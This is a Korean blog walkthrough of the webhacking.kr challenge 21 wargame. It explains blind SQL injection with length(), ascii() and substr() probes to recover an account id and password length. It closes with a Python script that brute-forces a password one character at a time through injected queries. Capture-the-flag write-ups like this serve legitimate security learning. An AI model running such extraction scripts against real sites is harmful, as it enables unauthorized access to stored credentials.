webhacking.kr 21번

문제 첫화면 먼가 결과에 따라서 true , false를 출력하는 화면이다.

1과 2를 입력했을땐 true 3이상 숫자를 입력했을 땐 false

또한 input hidden으로 id, pw값도 같이 보내고있다. 

먼저 id의 길이를 알아보기 위해, length(id)를 이용해서 id의 길이를 알아보기로했다. 일단 1은 false

노가다로 5를 입력했더니 True

두번째 no =2 의 길이도 알아보기로 했다. 역시 1은 false

5를 입력했을 시 True 5글자면 admin?? 이라고 예상했다. 여기까지 알아본 정보

no	id	pw
1	? 5자리	?
2	? 5자리	?

이어서 pw의 길이를 알아보기로 했다 역시 1은 false

no= 1의 pw 의 길이는 5자리

역시 no=2 pw의 길이 1는 false

19 true

여기까지 정리된 정보

no	id	pw
1	? 5자리	? 5자리
2	? 5자리	? 19자리

SQL - ascii = 숫자를 아스키코드로 변환할때 사용했다.

SQL - substr = substr(문자열, 시작위치, 나타낼 개수)로 사용했다

즉 ascii(substr(id,1,1))=97은

id칼럼에 첫번째 값이 a인지 확인하는 구문이다.

근데 false인걸로 보아 no =1 의 id값은 admin이 아니다?

혹시 몰라 no =2을 확인해보니 a는 true

ascii 100 = d d도 정답

즉 no = 2 id값은 admin

no	id	pw
1	? 5자리	? 5자리
2	admin	? 19자리

pw를 알아내는 방법은 엄청난 노가다가 예상되기때문에 파이썬 코드를 사용했으며, 파이썬에대해서 자세히 공부한적은 없기때문에 

구글링을 했다.

(파이썬 공부가 필요할거같다.)

from http import client

  

conn = client.HTTPConnection('webhacking.kr',80)

headers = {'Cookie':'PHPSESSID=본인의 세션아이디'} # 풀이자 본인의 세션 값을 입력하면 됨

base="http://webhacking.kr/challenge/bonus/bonus-1/index.php?no="

  

tryList=[]

awsList=[]

  

  

for i in range(97,123): # 아스키 코드 값(영문 소문자) 기반으로 문자열을 정리한다.

    tryList.append(chr(i))

      

for i in range(1,20): # id의 문자열이 20개이므로 20번 반복해 준다.

    for w in tryList:

    

        url="2+and+ascii%28substr%28pw%2c"+str(i)+"%2c1%29%29%3d"+hex(ord(w))+""

 

        # print(base+url)

 

        conn.request('PUT', base+url,'',headers)

        res = conn.getresponse()

        resData=res.read()  # 가져온 페이지의 데이터를 읽는다.

        strRes = str(resData.decode()) # 가져온 페이지의 데이터를 문자열로 형변환한다.

         

        # print(strRes)

 

        n = strRes.find("True") # 찾은 문자열에 해당하는 인덱스가 담긴다.

         

        if(n != -1) : # 해당 문자열을 찾았을 경우 (-1은 찾지 못한 경우를 말함)

            print("i="+str(i)+" pw="+hex(ord(w)) +" " + w)

            awsList.append(w)

            print(str(awsList))

            break

         

 

 

print("정답은"+str(awsList)+"입니다.")

conn.close()

출처: https://lidron.tistory.com/95 [이프이푸이푸]